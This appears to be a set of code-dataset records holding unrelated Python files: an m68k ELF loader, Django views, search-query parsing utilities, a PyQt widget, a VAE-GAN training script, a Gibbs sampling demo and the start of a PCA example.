+{"seq_id":"72965917","text":"import json\nimport os\nfrom typing import Any, Dict, List\n\nfrom eth_utils import add_0x_prefix\nfrom solcx import compile_standard\nfrom web3 import Web3\nfrom web3._utils.abi import get_constructor_abi\nfrom web3._utils.contracts import encode_abi\n\nfrom .files import find_files\n\nDEFAULT_OUTPUT_SELECTION = [\n \"abi\",\n \"devdoc\",\n \"userdoc\",\n \"metadata\",\n \"evm.bytecode\",\n \"evm.deployedBytecode\",\n]\n\nABI_OUTPUT_SELECTION = [\"abi\", \"userdoc\"]\n\nDEFAULT_EVM_VERSION = \"petersburg\"\n\n\ndef load_sources(file_paths: List[str]):\n result = {}\n for file_path in file_paths:\n with open(file_path) as 
source_file:\n result[file_path] = {\"content\": source_file.read()}\n return result\n\n\ndef normalize_contract_data(contract_data: Dict):\n result = {}\n\n for key, value in contract_data.items():\n if key == \"evm\":\n evm_data = value\n\n if \"bytecode\" in evm_data:\n result[\"bytecode\"] = add_0x_prefix(\n evm_data[\"bytecode\"].get(\"object\", \"\")\n )\n\n if \"deployedBytecode\" in evm_data:\n result[\"deployedBytecode\"] = add_0x_prefix(\n evm_data[\"deployedBytecode\"].get(\"object\", \"\")\n )\n\n elif key == \"metadata\":\n if value:\n result[key] = json.loads(value)\n\n else:\n result[key] = value\n\n return result\n\n\ndef normalize_compiled_contracts(compiled_contracts: Dict, file_paths: List[str]):\n result: Dict[str, Dict] = {}\n\n for source_path, file_contracts in compiled_contracts.items():\n if source_path not in file_paths:\n continue\n\n for contract_name, raw_contract_data in file_contracts.items():\n contract_data = normalize_contract_data(raw_contract_data)\n if contract_name not in result:\n result[contract_name] = contract_data\n else:\n raise BaseException(\"Can not compile two contracts with the same name\")\n\n return result\n\n\ndef log_compilation_errors(errors: List[Dict]):\n for error in errors:\n if \"formattedMessage\" in error:\n print(error[\"formattedMessage\"])\n else:\n print(error[\"message\"])\n\n\ndef compile_project(\n contracts_path: str = None,\n *,\n file_paths: List[str] = None,\n allow_paths: List[str] = None,\n pattern=\"*.sol\",\n optimize=True,\n optimize_runs=500,\n only_abi=False,\n evm_version: str = DEFAULT_EVM_VERSION,\n):\n \"\"\"\n Compiles all contracts of the project into a single output\n Args:\n contracts_path: The path of the folder that includes the contracts, defaults to 'contracts'\n file_paths: A list of to compiled contracts can be provided (optional)\n allow_paths: Additional paths from where it is allowed to load contracts\n pattern: The pattern to find the solidity files\n optimize: Whether to turn on the solidity optimizer\n optimize_runs: Number of contract runs to optimize for\n only_abi: Whether to only create the abi or not\n evm_version: target evm version to use for generated code\n\n Returns: A dictionary containing the compiled assets of the contracts\n \"\"\"\n\n if file_paths is None:\n file_paths = []\n\n if allow_paths is None:\n allow_paths = []\n\n if contracts_path is None and not file_paths:\n contracts_path = \"contracts\"\n\n if contracts_path is not None:\n file_paths.extend(find_files(contracts_path, pattern=pattern))\n allow_paths.append(contracts_path)\n\n sources = load_sources(file_paths)\n\n if only_abi:\n output_selection = ABI_OUTPUT_SELECTION\n else:\n output_selection = DEFAULT_OUTPUT_SELECTION\n\n std_input = {\n \"language\": \"Solidity\",\n \"sources\": sources,\n \"settings\": {\n \"outputSelection\": {\"*\": {\"*\": output_selection}},\n \"evmVersion\": evm_version,\n },\n }\n\n if optimize:\n std_input[\"settings\"][\"optimizer\"] = {\"enabled\": True, \"runs\": optimize_runs}\n\n compilation_result = compile_standard(\n std_input, allow_paths=\",\".join(os.path.abspath(path) for path in allow_paths)\n )\n\n if \"errors\" in compilation_result:\n log_compilation_errors(compilation_result[\"errors\"])\n\n compiled_contracts = normalize_compiled_contracts(\n compilation_result[\"contracts\"], file_paths\n )\n return compiled_contracts\n\n\ndef compile_contract(\n name: str, *, contracts_path=\"contracts\", file_extension=\".sol\", optimize=True\n):\n filename = name + 
file_extension\n file_paths = list(find_files(contracts_path, filename))\n\n if len(file_paths) < 1:\n raise ValueError(\"File not found: {}\".format(filename))\n\n if len(file_paths) > 1:\n raise ValueError(\"Multiple files found: {}\".format(file_paths))\n\n compiled_contracts = compile_project(\n file_paths=file_paths, allow_paths=[contracts_path], optimize=optimize\n )\n return compiled_contracts[name]\n\n\ndef build_initcode(*, contract_bytecode, contract_abi=[], constructor_args=[]):\n constructor_abi = get_constructor_abi(contract_abi)\n\n # The initcode is the bytecode with the encoded arguments appended\n if constructor_abi:\n return encode_abi(\n web3=Web3(),\n abi=constructor_abi,\n arguments=constructor_args,\n data=contract_bytecode,\n )\n else:\n return contract_bytecode\n\n\nclass UnknownContractException(Exception):\n pass\n\n\ndef filter_contracts(\n contract_names: List[str], contract_assets_in: Dict[str, Any]\n) -> Dict[str, Any]:\n if contract_names is None:\n return contract_assets_in.copy()\n\n output_dict: Dict[str, Any] = {}\n try:\n for contract_name in contract_names:\n output_dict[contract_name] = contract_assets_in[contract_name]\n except KeyError as e:\n raise UnknownContractException(*e.args) from e\n\n return output_dict\n","sub_path":"src/deploy_tools/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":5960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"486060411","text":"from django.db.models import ObjectDoesNotExist\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.template import loader\n\nimport arrow\nfrom gestionnaire.forms import RechercheForm, EmpruntForm\nfrom .models import Outil, Emprunt\n\nfrom .forms import *\n\n\n# Create your views here.\n\n\ndef test(request):\n return render(request, 'gestionnaire/test.html')\n\n\ndef index(request):\n template = loader.get_template('gestionnaire/index.html')\n return HttpResponse(template.render({}, request))\n\n\ndef liste_outil(request):\n recherche_text = ''\n recherche_lieu = ''\n if request.method == 'POST':\n formulaire_recherche = RechercheForm(request.POST)\n if formulaire_recherche.is_valid():\n recherche_text = formulaire_recherche.cleaned_data['nom_text']\n recherche_lieu = formulaire_recherche.cleaned_data['lieu']\n if recherche_lieu is None:\n recherche_lieu = ''\n\n formulaire_recherche = RechercheForm()\n outil_list = Outil.objects.order_by('reference_text').filter(nom_text__contains=recherche_text, lieu__nom_text__contains=recherche_lieu)\n outil_list = outil_list.exclude(nom_text='Sarah la plus belle')\n\n template = loader.get_template('gestionnaire/liste_outil.html')\n context = {\n 'outil_list': outil_list,\n 'formulaire_recherche': formulaire_recherche,\n }\n return HttpResponse(template.render(context, request))\n\n\ndef detail_outil(request, outil_id):\n outil = get_object_or_404(Outil, id=outil_id)\n\n template = loader.get_template('gestionnaire/detail_outil.html')\n\n # L'utilisateur arrive sur la page.\n if request.method != 'POST':\n formulaire_emprunt = EmpruntForm()\n\n # L'utilisateur clic sur un bouton.\n else:\n formulaire_emprunt = EmpruntForm(request.POST)\n formulaire_emprunt.outil = outil\n if formulaire_emprunt.is_valid():\n emprunt = formulaire_emprunt.save(commit=False)\n emprunt.outil = outil\n emprunt.save()\n formulaire_emprunt = EmpruntForm()\n\n # Information sur l'outil.\n try:\n emprunts_non_rendu = 
outil.emprunt_set.filter(rendu_date__isnull=True)\n emprunts_non_rendu = emprunts_non_rendu.order_by('debut_emprunt_date')\n except ObjectDoesNotExist:\n emprunts_non_rendu = \"\"\n\n # Template et variable.\n\n context = {'outil': outil,\n 'emprunts_non_rendu': emprunts_non_rendu,\n 'formulaire_emprunt': formulaire_emprunt,\n }\n return HttpResponse(template.render(context, request))\n\n\ndef confirmation_rendre_outil(request, outil_id, emprunt_id):\n outil = get_object_or_404(Outil, id=outil_id)\n emprunt = get_object_or_404(Emprunt, id=emprunt_id)\n template = loader.get_template('gestionnaire/confirmation_rendre_outil.html')\n context = {'outil': outil,\n 'emprunt': emprunt,\n }\n return HttpResponse(template.render(context, request))\n\n\ndef rendre_outil(request, outil_id, emprunt_id):\n emprunt = get_object_or_404(Emprunt, id=emprunt_id)\n emprunt.rendu_date = arrow.utcnow().datetime\n emprunt.save()\n\n return HttpResponseRedirect('/gestionnaire/liste_outil/{0}'.format(outil_id))\n","sub_path":"gestionnaire/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"107986181","text":"from nltk.stem.porter import *\nimport math\n\ndef tokenize(word):\n '''\n Tokenises a given word with Porter Stemmer and case folding\n '''\n word = word.lower()\n word = PorterStemmer().stem(word)\n return word\n\ndef add_skip_ptr(posting_list):\n '''\n Returns a string form of posting list with skip pointers, indicated by carat\n '''\n l = len(posting_list)\n result = ''\n if l > 2:\n num_ptr = math.floor(math.sqrt(l))\n ptr_gap = math.floor(l / num_ptr)\n for i in range(l):\n if i % ptr_gap == 0 and i < l - 2:\n if i + ptr_gap >= l:\n result += str(posting_list[i]) + \\\n ' ^' + str(l - i - 1) + ' '\n else:\n result += str(posting_list[i]) + ' ^' + str(ptr_gap) + ' '\n else:\n result += str(posting_list[i]) + ' '\n else:\n for i in range(l):\n result += str(posting_list[i]) + ' '\n return result\n\ndef list_to_string(my_list):\n '''\n Stringifies and concatenates (with a space between) the elements of the given list\n '''\n res = ''\n for l in my_list:\n res += str(l) + ' '\n return res\n\ndef split_bool_expr(expression):\n '''\n Splits given boolean string expression into string list of operators and operands\n\n Operators handled: AND, OR, NOT, ()\n\n Assumptions: no nested (); expression is valid\n '''\n initial_split = expression.split()\n final_split = []\n for item in initial_split:\n if item[0] == \"(\" and item[-1] == \")\":\n final_split.extend([\"(\", item[1:-1], \")\"])\n elif item[0] == \"(\":\n final_split.extend([\"(\", item[1:]])\n elif item[len(item) - 1] == \")\":\n final_split.extend([item[:-1], \")\"])\n else:\n final_split.append(item)\n\n return final_split\n\ndef has_greater_or_equal_precedence(op1, op2):\n '''\n Returns true if `op1` has greater than or equal precedence to `op2`. 
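(With the two operators handled here, AND outranks OR and any operator ties with itself.) 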
False otherwise.\n\n Operators handled (decreasing precedence): AND, OR\n '''\n return (op1 == \"AND\" and op2 == \"OR\") or op1 == op2\n\ndef infix_to_postfix(expression):\n '''\n Translates string infix boolean expression to string list postfix boolean expression\n\n Operators handled: AND, OR, NOT, ()\n\n Assumptions: no nested (); expression is valid\n '''\n split_expr = split_bool_expr(expression)\n output_queue = [] # first in, first out\n operator_stack = [] # last in, first out\n unary_list = []\n\n # use Shunting-Yard algorithm, with modifications to handle NOT unary operator\n for item in split_expr:\n if item == \"NOT\":\n unary_list.append(item)\n elif item == \"AND\" or item == \"OR\":\n while len(operator_stack) > 0 and has_greater_or_equal_precedence(operator_stack[-1], item) and operator_stack[-1] != \"(\":\n output_queue.append(operator_stack.pop())\n operator_stack.append(item)\n elif item == \"(\":\n operator_stack.append(item)\n if len(unary_list) > 0:\n unary_list.append(item)\n elif item == \")\":\n while operator_stack[-1] != \"(\":\n output_queue.append(operator_stack.pop())\n if operator_stack[-1] == \"(\":\n operator_stack.pop()\n if len(unary_list) > 0 and unary_list[-1] == \"(\":\n unary_list.pop()\n while len(unary_list) > 0 and unary_list[-1] != \"(\":\n output_queue.append(unary_list.pop())\n else:\n # item is an operand\n output_queue.append(item)\n if len(unary_list) > 0:\n while len(unary_list) > 0 and unary_list[-1] != \"(\":\n output_queue.append(unary_list.pop())\n \n for operator in reversed(operator_stack):\n output_queue.append(operator)\n \n return output_queue\n","sub_path":"HW2/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"562514439","text":"\"\"\"\n Filter List Widget with add remove buttons\n\"\"\"\nimport sys\nfrom typing import Union\nfrom PyQt5.QtCore import pyqtSlot, pyqtSignal\nfrom PyQt5.QtWidgets import (\n QApplication, QWidget, QVBoxLayout, QHBoxLayout, QListView, QLineEdit,\n QSizePolicy, QListWidgetItem, QFrame, QLabel\n)\nfrom PyQt5.QtGui import QStandardItemModel, QStandardItem\nfrom CustomWidgets.add_remove_buttons import EDAddRemoveButtons\n\n\nclass EDFilterListWidget(QWidget):\n \"\"\"FilterListWidget Combines a QLineEdit and a QListView\"\"\"\n add = pyqtSignal()\n remove = pyqtSignal()\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n\n v_layout = QVBoxLayout(self)\n h_layout = QHBoxLayout()\n\n filter_frame = QFrame(self)\n filter_h_layout = QHBoxLayout(filter_frame)\n filter_h_layout.setContentsMargins(0, 0, 0, 0)\n size_policy = QSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Fixed)\n filter_frame.setSizePolicy(size_policy)\n\n filter_lbl = QLabel(\"Filter\")\n self.line_edit = QLineEdit(self)\n\n filter_h_layout.addWidget(filter_lbl)\n filter_h_layout.addWidget(self.line_edit)\n\n h_layout.addWidget(filter_frame)\n self.line_edit.textEdited.connect(self.filter)\n\n self.list = QListView(self)\n self.model = QStandardItemModel(self.list)\n self.list.setModel(self.model)\n size_policy = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\n self.list.setSizePolicy(size_policy)\n\n v_layout.addLayout(h_layout)\n v_layout.addWidget(self.list)\n\n self.controls = EDAddRemoveButtons(parent=self)\n self.controls.add_btn.clicked.connect(self.add_item)\n self.controls.rm_btn.clicked.connect(self.remove_item)\n v_layout.addWidget(self.controls)\n\n def filter(self, 
filter_text):\n \"\"\"Hides rows that do not have the pattern\"\"\"\n for row in range(self.model.rowCount()):\n if filter_text in str(self.model.item(row).text()).lower():\n self.list.setRowHidden(row, False)\n else:\n self.list.setRowHidden(row, True)\n\n @pyqtSlot()\n def add_item(self):\n \"\"\"Add item\"\"\"\n self.add.emit()\n\n @pyqtSlot()\n def remove_item(self):\n \"\"\"Remove Item\"\"\"\n self.remove.emit()\n\n def clear(self):\n \"\"\"Clear the model\"\"\"\n self.model.clear()\n\n # pylint: disable=invalid-name\n def takeItem(self, row: int):\n \"\"\"Take Item from the list\"\"\"\n item = self.model.takeItem(row)\n self.model.takeRow(row)\n return item\n\n # pylint: disable=invalid-name\n def addItem(self, item: Union[QListWidgetItem, QStandardItem, str]):\n \"\"\"Add Item to the list\"\"\"\n if isinstance(item, str):\n item = QStandardItem(item)\n self.model.appendRow(item)\n\n def count(self):\n \"\"\"Convenience method\"\"\"\n return self.model.rowCount()\n\n def item(self, row):\n \"\"\"Convenience method to reveal model method\"\"\"\n return self.model.item(row)\n\n # pylint: disable=invalid-name\n def selectedIndexes(self):\n \"\"\"Convenience Function to reveal selectionModel option\"\"\"\n return self.list.selectionModel().selectedIndexes()\n\n # pylint: disable=invalid-name\n def selectedItems(self):\n \"\"\"Convenience to replicate functionality in QListWidget\"\"\"\n inds = self.selectedIndexes()\n items = [self.item(i.row()) for i in inds]\n return items\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n codes = [\n 'LOAA-05379',\n 'LOAA-04468',\n 'LOAA-03553',\n 'LOAA-02642',\n 'LOAA-05731'\n ]\n\n ex = EDFilterListWidget()\n\n for code in codes:\n an_item = QStandardItem(code)\n an_item.setCheckable(True)\n ex.model.appendRow(an_item)\n\n ex.show()\n sys.exit(app.exec_())\n","sub_path":"build/lib/CustomWidgets/filter_list_widget.py","file_name":"filter_list_widget.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3776344","text":"import csv\nwith open('iowa_gop_results.csv') as csvfile:\n # instantiate csv reader to read results file\n resultsreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n # initialize variables\n county = ''\n rowlist = []\n resultsdict = {}\n # skip first line of csv file\n next(resultsreader)\n for row in resultsreader:\n # store old county data in separate variable\n oldcounty = county\n county = row[0]\n # for each new county cluster, add county (key) & rowlist (val) to resultsdict and reset\n if oldcounty != county and oldcounty != '':\n resultsdict[oldcounty] = rowlist\n rowlist = []\n oldcounty = county\n # add candidate voting results to rowlist\n rowlist.append({\n 'votes':int(row[1]),\n 'percentage':float(row[2]) * 100,\n 'candidate':row[3] })\n # add last rowlist to resultsdict\n resultsdict[oldcounty] = rowlist\n","sub_path":"iowa_results.py","file_name":"iowa_results.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"635855929","text":"#\n# ELF image loader\n#\nimport os\nimport subprocess # needed by image.lineinfo() below\nfrom bisect import bisect\n\nfrom musashi.m68k import (\n mem_ram_write_block\n)\n\nfrom elftools.elf.elffile import ELFFile\nfrom elftools.elf.sections import SymbolTableSection\nfrom elftools.elf.constants import SH_FLAGS\nfrom elftools.elf.descriptions import (\n describe_e_machine,\n describe_e_type\n)\n\n\nclass image(object):\n \"\"\"\n 
Program image in the emulator\n \"\"\"\n\n def __init__(self, emu, image_filename):\n \"\"\"\n Read the ELF headers and prepare to load the executable\n \"\"\"\n\n self._emu = emu\n self._lineinfo_cache = dict()\n self._symbol_cache = dict()\n self._address_cache = dict()\n self._addr2line = self._findtool('m68k-elf-addr2line')\n self._text_base = 0\n self._text_end = 0\n self._low_sym = 0xffffffff\n self._high_sym = 0\n\n if self._addr2line is None:\n raise RuntimeError(\n \"unable to find m68k-elf-addr2line and/or m68k-elf-readelf, check your PATH\")\n\n elf_fd = open(image_filename, \"rb\")\n self._elf = ELFFile(elf_fd)\n\n if self._elf.header['e_type'] != 'ET_EXEC':\n raise RuntimeError('not an ELF executable file')\n if self._elf.header['e_machine'] != 'EM_68K':\n raise RuntimeError('not an M68K ELF file')\n if self._elf.num_segments() == 0:\n raise RuntimeError('no segments in ELF file')\n\n # iterate sections\n for section in self._elf.iter_sections():\n\n # does this section need to be loaded?\n if section['sh_flags'] & SH_FLAGS.SHF_ALLOC:\n p_addr = section['sh_addr']\n p_size = section['sh_size']\n self._emu.log(\n '{} {:#x}/{:#x} '.format(section.name, p_addr, p_size))\n\n # XXX should really be a call on the emulator\n mem_ram_write_block(p_addr, p_size, section.data())\n\n if section.name == '.text':\n self._text_base = p_addr\n self._text_end = p_addr + p_size\n\n # does it contain symbols?\n if isinstance(section, SymbolTableSection):\n self._cache_symbols(section)\n\n self._symbol_index = sorted(self._symbol_cache.keys())\n\n def _cache_symbols(self, section):\n\n for nsym, symbol in enumerate(section.iter_symbols()):\n\n # only interested in data and function symbols\n s_type = symbol['st_info']['type']\n if s_type != 'STT_OBJECT' and s_type != 'STT_FUNC':\n continue\n\n s_addr = symbol['st_value']\n s_size = symbol['st_size']\n s_name = str(symbol.name)\n\n self._low_sym = min(s_addr, self._low_sym)\n self._high_sym = max(s_addr + s_size, self._high_sym)\n\n self._symbol_cache[s_addr] = {'name': s_name, 'size': s_size}\n self._address_cache[s_name] = s_addr\n\n def _findtool(self, tool):\n for path in os.environ['PATH'].split(os.pathsep):\n path = path.strip('\"')\n candidate = os.path.join(path, tool)\n if os.path.isfile(candidate) and os.access(candidate, os.X_OK):\n return candidate\n return None\n\n def lineinfo(self, addr):\n try:\n return self._lineinfo_cache[addr]\n\n except KeyError:\n\n # -i gives extra information about inlined functions, but it puts\n # newlines in the result that mess up the log...\n\n symb = subprocess.Popen([self._addr2line,\n '-pfC',\n '-e',\n args.image,\n '{:#x}'.format(addr)],\n stdout=subprocess.PIPE)\n output, err = symb.communicate()\n\n self._lineinfo_cache[addr] = output\n return output\n\n def symname(self, addr):\n if addr < self._low_sym or addr >= self._high_sym:\n return ''\n\n try:\n return self._symbol_cache[addr]['name']\n\n except KeyError:\n # look for the next highest symbol address\n pos = bisect(self._symbol_index, addr)\n if pos == 0:\n # address lower than anything we know\n return ''\n insym = self._symbol_index[pos - 1]\n\n # check that the value is within the symbol\n delta = addr - insym\n if self._symbol_cache[insym]['size'] <= delta:\n return ''\n\n # it is, construct a name + offset string\n name = '{}+{:#x}'.format(self._symbol_cache[insym]['name'], delta)\n\n # add it to the symbol cache\n self._symbol_cache[addr] = {'name': name, 'size': 1}\n\n return name\n\n def symrange(self, name):\n try:\n addr = 
self._address_cache[name]\n size = self._symbol_cache[addr]['size']\n except KeyError:\n try:\n addr = int(name)\n size = 1\n except:\n raise RuntimeError(\n 'can\\'t find a symbol called {} and can\\'t convert it to an address'.format(name))\n\n return range(addr, addr + size)\n\n def check_text(self, addr):\n if addr < self._text_base or addr >= self._text_end:\n return False\n return True\n","sub_path":"imageELF.py","file_name":"imageELF.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"209473483","text":"import csv\nimport logging\nfrom location.location import Location\n\n\nclass Component(object):\n csv_file = \"\"\n csv_reader = \"\"\n\n def __init__(self, company_name):\n file_name = Location(__file__, company_name.lower() + \"_components.csv\")\n try:\n self.csv_file = open(file_name, \"rt\", encoding=\"utf8\")\n self.csv_reader = csv.reader(self.csv_file, delimiter=';')\n except Exception as error:\n logging.warning(\"class Fetch_Component: Opening CSV file failed. Error: {0}\".format(error))\n\n def reset_reader(self):\n self.csv_file.seek(0)\n\n def get_id(self, component_url):\n \"\"\"\n Fetch id from the component url.\n row[0] contains the id\n row[1] contains the component\n :param component_url: string\n :return: integer\n \"\"\"\n result = False\n for row in self.csv_reader:\n if component_url.lower().find(row[1]) > 0:\n result = int(row[0])\n self.reset_reader()\n break\n\n return result\n","sub_path":"crawler/component/fetch_component.py","file_name":"fetch_component.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"186207840","text":"import argparse\nimport os\nimport sys\n\nimport numpy as np\nimport chainer\nfrom chainer import training\nfrom chainer.training import extension\nfrom chainer.training import extensions\nfrom chainer.datasets import TransformDataset\nfrom chainercv.transforms import random_rotate\nfrom chainercv.transforms.image.resize import resize\n\nsys.path.append(os.path.dirname(__file__))\n\nfrom common.dataset import Cifar10Dataset\nfrom common.dataset import ImagenetDataset\nfrom common.dataset import CelebA\nfrom common.evaluation import sample_generate, sample_generate_light, calc_inception, calc_FID\nfrom common.record import record_setting\nimport common.net\n\ndef make_optimizer(model, alpha, beta1, beta2):\n optimizer = chainer.optimizers.Adam(alpha=alpha, beta1=beta1, beta2=beta2)\n optimizer.setup(model)\n return optimizer\n\nparser = argparse.ArgumentParser(description='Train script')\nparser.add_argument('--algorithm', '-a', type=str, default=\"dcgan\", help='GAN algorithm')\nparser.add_argument('--architecture', type=str, default=\"dcgan\", help='Network architecture')\nparser.add_argument('--batchsize', type=int, default=64)\nparser.add_argument('--max_iter', type=int, default=100000)\nparser.add_argument('--gpu', '-g', type=int, default=0, help='GPU ID (negative value indicates CPU)')\nparser.add_argument('--out', '-o', default='result', help='Directory to output the result')\nparser.add_argument('--snapshot_interval', type=int, default=10000, help='Interval of snapshot')\nparser.add_argument('--evaluation_interval', type=int, default=10000, help='Interval of evaluation')\nparser.add_argument('--display_interval', type=int, default=100, help='Interval of displaying log to console')\nparser.add_argument('--n_dis', type=int, default=5, 
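# assumption: the default of 5 discriminator steps per generator step mirrors the usual WGAN-style schedule; this repo does not say so explicitly\n 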
help='number of discriminator update per generator update')\nparser.add_argument('--gamma', type=float, default=0.5, help='hyperparameter gamma')\nparser.add_argument('--lam', type=float, default=10, help='gradient penalty')\nparser.add_argument('--adam_alpha', type=float, default=0.0001, help='alpha in Adam optimizer')\nparser.add_argument('--adam_beta1', type=float, default=0.5, help='beta1 in Adam optimizer')\nparser.add_argument('--adam_beta2', type=float, default=0.9, help='beta2 in Adam optimizer')\nparser.add_argument('--output_dim', type=int, default=256, help='output dimension of the discriminator (for cramer GAN)')\n\nargs = parser.parse_args()\nrecord_setting(args.out)\nreport_keys = [\"loss_enc\", \"loss_dis\", \"loss_gen\", \"inception_mean\", \"inception_std\", \"FID\"]\n\n# Set up dataset\n# train_dataset = Cifar10Dataset()\n# train_dataset = CelebA()\ndataset = np.load('./hrp2.npz')['arr_0']\n\n\ndef transform(in_data):\n img = in_data\n img = img.astype(np.float32).transpose((2, 0, 1))\n img /= 255.0\n img = resize(img, (128, 128))\n return img\n\n\ntrain_dataset = TransformDataset(dataset, transform)\ntrain_iter = chainer.iterators.SerialIterator(train_dataset, args.batchsize)\n\n# Setup algorithm specific networks and updaters\nmodels = []\nopts = {}\nupdater_args = {\n \"iterator\": {'main': train_iter},\n \"device\": args.gpu\n}\n\n\nfrom vaegan.updater import Updater\nsize = 128\nbottom_width = (size // 8)\nencoder = common.net.VAEEncoder(size=size)\ngenerator = common.net.DCGANGenerator(n_hidden=100, bottom_width=bottom_width,\n ch=256, z_distribution=\"normal\")\ndiscriminator = common.net.DCGANDiscriminator(ch=256, bottom_width=bottom_width,\n output_dim=2)\nmodels = [encoder, generator, discriminator]\n\n\nif args.gpu >= 0:\n chainer.cuda.get_device_from_id(args.gpu).use()\n print(\"use gpu {}\".format(args.gpu))\n for m in models:\n m.to_gpu()\n\n# Set up optimizers\nopts[\"opt_enc\"] = make_optimizer(encoder, args.adam_alpha, args.adam_beta1, args.adam_beta2)\nopts[\"opt_enc\"].add_hook(chainer.optimizer.WeightDecay(0.00001))\nopts[\"opt_gen\"] = make_optimizer(generator, args.adam_alpha, args.adam_beta1, args.adam_beta2)\nopts[\"opt_gen\"].add_hook(chainer.optimizer.WeightDecay(0.00001))\nopts[\"opt_dis\"] = make_optimizer(discriminator, args.adam_alpha, args.adam_beta1, args.adam_beta2)\nopts[\"opt_dis\"].add_hook(chainer.optimizer.WeightDecay(0.00001))\n\nupdater_args[\"optimizer\"] = opts\nupdater_args[\"models\"] = models\n\n# Set up updater and trainer\nupdater = Updater(**updater_args)\ntrainer = training.Trainer(updater, (args.max_iter, 'iteration'), out=args.out)\n\n# Set up logging\nfor m in models:\n trainer.extend(extensions.snapshot_object(\n m, m.__class__.__name__ + '_{.updater.iteration}.npz'), trigger=(args.snapshot_interval, 'iteration'))\ntrainer.extend(extensions.LogReport(keys=report_keys,\n trigger=(args.display_interval, 'iteration')))\ntrainer.extend(extensions.PrintReport(report_keys), trigger=(args.display_interval, 'iteration'))\ntrainer.extend(sample_generate(generator, args.out), trigger=(args.evaluation_interval, 'iteration'),\n priority=extension.PRIORITY_WRITER)\ntrainer.extend(sample_generate_light(generator, args.out), trigger=(args.evaluation_interval // 10, 'iteration'),\n priority=extension.PRIORITY_WRITER)\ntrainer.extend(calc_inception(generator), trigger=(args.evaluation_interval, 'iteration'),\n priority=extension.PRIORITY_WRITER)\ntrainer.extend(calc_FID(generator), trigger=(args.evaluation_interval, 'iteration'),\n 
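# assumption: PRIORITY_WRITER asks chainer to run these metric extensions before log-writing extensions read the observations\n 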
priority=extension.PRIORITY_WRITER)\ntrainer.extend(extensions.ProgressBar(update_interval=10))\n\n# Run the training\ntrainer.run()\n","sub_path":"train_vae.py","file_name":"train_vae.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"181211492","text":"# coding: UTF-8\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\n\n## 2dimention normal distribution\nnu = np.ones((2))\ncovariance = np.array([[0.5,0.5],[0.5,3]])\n# la: 固有値array\n# v: 固有ベクトル array\nla,v = np.linalg.eig(covariance)\navr_sigma = np.average(la) #あとでプロット範囲を決めるときの指標に\n\ndef gibssampling(nu,cov,sample_size):\n \"\"\"\n Gibbs sampling !\n @nu :average vector\n @cov :covariance matrix\n @sample_size :size of sample\n return type :numpy.array\n length :sample_size\n \"\"\"\n samples = []\n dim = len(nu)\n # start point of sampling\n start = [0,0]\n samples.append(start)\n search_dim = 0\n for i in range(sample_size):\n if search_dim == dim-1:\n \"\"\"\n search dimension select is cyclic\n it can replace randomly\n \"\"\"\n search_dim = 0\n else:\n search_dim = search_dim +1\n #new-sampling\n\n prev_sample = samples[-1][:] # previous sample\n A = cov[search_dim][search_dim-1] / float(cov[search_dim-1][search_dim-1]) # A*Σ_yy = Σ_xy\n _y = prev_sample[search_dim-1] # other dimention's previous values\n\n # p(x|y) ~ N(x|nu[x]+A(_y-nu[y]),Σ_zz)\n # Σ_zz = Σ_xx - A0*Σ_yx\n\n mean = nu[search_dim] + A*(_y-nu[search_dim-1])\n sigma_zz = cov[search_dim][search_dim] -A*cov[search_dim-1][search_dim]\n\n sample_x = np.random.normal(loc=mean,scale=np.power(sigma_zz,.5),size=1)\n prev_sample[search_dim] = sample_x[0]\n samples.append(prev_sample)\n return np.array(samples)\n\nsample = gibssampling(nu,covariance,1000)\nplt.plot(sample[:,0],sample[:,1],\"o\",alpha=.1)\n\n#答え合わせ\nmalti_normal = stats.multivariate_normal(mean=nu,cov=covariance)\nX,Y = np.meshgrid(np.linspace(nu[0]-avr_sigma*2,nu[0]+avr_sigma*2,100),\n np.linspace(nu[1]-avr_sigma*2,nu[1]+avr_sigma*2,100))\nPos = np.empty(X.shape + (2,))\nPos[:,:,0]=X\nPos[:,:,1]=Y\nZ=malti_normal.pdf(Pos)\nplt.contour(X,Y,Z,colors=\"k\")\nplt.show()\n","sub_path":"python_study/gibs_sampling.py","file_name":"gibs_sampling.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"537337322","text":"import numpy as np\n\nx = np.array([2.5,0.5,2.2,1.9,3.1,2.3,2,1,1.5,1.1])\ny = np.array([2.4,0.7,2.9,2.2,3,2.7,1.6,1.1,1.6,0.9])\n\n# Step 1: 求平均值以及做normalization\nmean_x = np.mean(x)\nmean_y = np.mean(y)\nscaled_x = x - mean_x\nscaled_y = y - mean_y\ndata = np.matrix([[scaled_x[i],scaled_y[i]] for i in range(len(scaled_x))])\nprint (\"scaled_x:\\n\",scaled_x)\nprint (\"scaled_y:\\n\",scaled_y)\nprint (\"data:\\n\",data)\n\n# Step 2: 求协方差矩阵(Covariance 